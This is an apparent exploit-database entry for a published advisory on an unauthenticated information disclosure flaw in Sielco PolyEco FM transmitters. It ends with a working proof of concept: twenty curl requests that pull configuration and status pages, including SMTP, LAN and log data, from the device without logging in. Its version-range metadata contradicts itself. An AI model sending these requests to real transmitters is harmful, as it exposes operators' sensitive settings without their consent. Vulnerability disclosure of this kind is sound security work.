header-logo
Suggest Exploit
vendor:
PolyEco Digital FM Transmitter
by:
LiquidWorm
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: PolyEco Digital FM Transmitter
Affected Version From: 2.0.6
Affected Version To: 1.7.2000
Patch Exists: YES
Related CWE:
CPE: a:sielco:polyeco_digital_fm_transmitter
Metasploit:
Other Scripts:
Platforms Tested: lwIP/2.1.1
2023

Sielco PolyEco Digital FM Transmitter 2.0.6 – Unauthenticated Information Disclosure

Sielco PolyEco is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information.

Mitigation:

Enforce proper access control and authentication.
Source

Exploit-DB raw data:

## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Author: LiquidWorm

Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
                  PolyEco1000 CPU:1.9.4 FPGA:10.19
                  PolyEco1000 CPU:1.9.3 FPGA:10.19
                  PolyEco500 CPU:1.7.0 FPGA:10.16
                  PolyEco300 CPU:2.0.2 FPGA:10.19
                  PolyEco300 CPU:2.0.0 FPGA:10.19

Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).

All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.

Desc: Sielco PolyEco is affected by an information disclosure
vulnerability due to improper access control enforcement. An
unauthenticated remote attacker can exploit this, via a specially
crafted request to gain access to sensitive information.

Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php


26.01.2023

--


$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi